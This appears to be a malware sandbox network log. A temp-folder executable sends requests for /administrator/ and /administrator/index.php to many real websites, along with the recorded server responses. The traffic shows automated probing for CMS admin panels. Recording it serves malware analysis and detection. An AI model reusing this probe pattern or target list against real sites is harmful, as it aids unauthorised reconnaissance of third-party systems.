                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x8wZDHWd%2FjV4U8JlElkcvHnRRQk7h5JegXSbOG3MgAODNXY4Mwh8K5wU8TdwaXgYBQUUZwWPZUK91j7OIgVnLQ9BQyThRypFSFmjqlHCpp%2FLN6qY%2BxSrAi0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb69ee14b0a5-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:06.186460972 CET  180  OUT  GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: rage.mp
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.315474033 CET  697  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://rage.mp/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MQdk3RG6CnPapng504S0C%2BAPzfTr5CI5bUySOXClwqsa%2BoqRwmt8fYHB%2F0wxDXMxL95A2DFEQQutHQ7sKbsUoHeKeJfeTE8Cjm02qFwhTUdRt86SdjNE3n8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42fc36b0a5-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
153         192.168.2.6  54998        201.134.41.61   80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:50.493994951 CET  183  OUT  GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.665334940 CET  578  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 345
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/administrator/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
154         192.168.2.6  55053        34.149.46.130   80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:50.538311005 CET  185  OUT  GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.647305965 CET  214  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
Feb 5, 2024 12:16:06.160037994 CET  194  OUT  GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.262521029 CET  223  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
155         192.168.2.6  55010        44.233.131.115  80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:50.553921938 CET  184  OUT  GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.729840040 CET  389  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://cloud.simplify3d.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
156 | 192.168.2.6 | 54755 | 164.100.128.15 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.553957939 CET | 181 | OUT | GET /administrator/ HTTP/1.1
Host: upsconline.nic.in
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.955607891 CET | 144 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://upsconline.nic.in/administrator/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0
Feb 5, 2024 12:14:58.657741070 CET | 190 | OUT | GET /administrator/index.php HTTP/1.0
Host: upsconline.nic.in
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:59.058626890 CET | 153 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://upsconline.nic.in/administrator/index.php
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
157 | 192.168.2.6 | 55061 | 104.21.14.245 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.577537060 CET | 178 | OUT | GET /administrator/ HTTP/1.1
Host: ag.ufa9999.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.705064058 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bosBlvmz7%2FxBQMu7rQ0ihtXGjC718i6u7IWII4cL%2FyHhNG2lxGf1AlBQmsK9CBd3GCoim8Syq8Rhc8XzqZx24f%2BT9rYBbgTKZnjdFs2UEFi7Cdi2Wxr9uJuNXgPWS2bY7w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb6a6b5212da-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:14:50.705082893 CET | 1192 | IN
Feb 5, 2024 12:14:50.705352068 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:14:50.796400070 CET | 234 | OUT | GET /administrator/index.php HTTP/1.1
Host: ag.ufa9999.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://ag.ufa9999.com/administrator/
Feb 5, 2024 12:14:50.917252064 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:05 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yVFSkXJDufHa9cqYPTBtGG2iX4EnLYKXpy%2FFcnsTEp3Q8bWWhnHe4FROoNiqVwnUAi50%2FtFeMHDmyJx7TbQY1Nw8Efg3TIRD5vMmtH1aHudBXRPU%2FtKx%2FusHTAzIW%2B76Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb6bcc0112da-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:14:50.917293072 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
158 | 192.168.2.6 | 55070 | 96.7.224.178 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.577598095 CET | 178 | OUT | GET /administrator/ HTTP/1.1
Host: naukrigulf.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.688481092 CET | 635 | IN | HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 277
Expires: Mon, 05 Feb 2024 11:14:50 GMT
Date: Mon, 05 Feb 2024 11:14:50 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Server-Timing: ak_p; desc="1707131690629_1611129006_213759684_14_8770_102_0_-";dur=1
Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;administrator&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131690&#46;cbdb6c4</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
159 | 192.168.2.6 | 55069 | 104.18.32.109 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.593239069 CET | 184 | OUT | GET /administrator/ HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.726685047 CET | 616 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:50 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:50 GMT
Location: https://sport.autoplay.cloud/administrator/
Set-Cookie: __cf_bm=1kNN2gUP3zgUX0cJqc.xtfUNwbj6eYfeLSUo4qntzCw-1707131690-1-AUdWQ7LE/6Pa45WcLtswJlMWfW2ZVH8vUvwpOpBXkdVZJQdn3MCxSk/wkTupHhHGjdIAHq/TkiqF4V3Km9H79oo=; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb6a8dd6673d-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:16:06.182488918 CET | 356 | OUT | GET /administrator/index.php HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cf_bm=1kNN2gUP3zgUX0cJqc.xtfUNwbj6eYfeLSUo4qntzCw-1707131690-1-AUdWQ7LE/6Pa45WcLtswJlMWfW2ZVH8vUvwpOpBXkdVZJQdn3MCxSk/wkTupHhHGjdIAHq/TkiqF4V3Km9H79oo=
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.319546938 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:16:21 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd42fdef673d-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: J=EExD6[NT^}8^?|HVOb7p,s `.4k0.}hVnrJPiZBoMY\XsW3X-vu.\&3`buFT,efZoE+(U!@UYY/D4*:dTMVF%G$\SF;NvAcI;w
Feb 5, 2024 12:16:06.319581985 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
160 | 192.168.2.6 | 55068 | 138.197.59.199 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.594302893 CET | 187 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.712445021 CET | 570 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 343
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/administrator/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>
Feb 5, 2024 12:14:53.034995079 CET | 196 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.153325081 CET | 588 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 352
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/administrator/index.php">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
161 | 192.168.2.6 | 55096 | 172.67.170.147 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.649003029 CET | 185 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.929996014 CET | 825 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0%2FLX3oAF9ShnpXItlQpJbhrd4pEUutsKrKuUQSVYqFjdw8tbeib38vcgdB0w%2BMZvIHFUkhiR7BFxi3aBuYbIJcCl2uhGVvQsrXCgQyrovHcSfC5g5pEWYohNIoiX6OVdqtDnaghLc3U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6aef156733-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
Feb 5, 2024 12:14:50.930012941 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:15:00.090667009 CET | 194 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:00.288050890 CET | 840 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UgW1zu35uFutzLXZX%2FJxCfE5AkabP6%2BrhC%2B%2BO0tUfBg1bRFdHI839xMGS9mlKbLu4SmkWS4SWMnkwujzJSNeLc%2BHzGxlXJ28Gkmd0HeiWIr9uYodPFWU74bX5HpiIAdhkYIhvUrynrY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abba5ea416733-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
Feb 5, 2024 12:15:00.288069010 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
162 | 192.168.2.6 | 55174 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.674981117 CET | 183 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.798202038 CET | 488 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
Feb 5, 2024 12:14:50.798221111 CET | 185 | IN | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 b0 35 d6 82 22 48 0e ed 31 68 30 82 71 25 89 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 95 68 6a 96 d0 8a e7 45 18 e2 2e 6a ce 1a 78 a9 01 09 65 56 b0 d2 4e f3 9b 92 ef
Feb 5, 2024 12:14:53.610881090 CET | 245 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://accounts.google.com/administrator/
Feb 5, 2024 12:14:53.733201027 CET | 497 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 192
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
Feb 5, 2024 12:14:53.733212948 CET | 192 | IN | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 a0 35 d6 82 22 48 0e ed 31 c4 60 02 c6 48 8c a5 fd fb 6a da 63 e7 b2 ec ec 30 bc 25 15 6f 6a 9a 90 8a 65 c5 36 f8 8d d7 8c 36 ee a9 7a c0 95 9d 9d 17 de 8c 6f 82 bf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
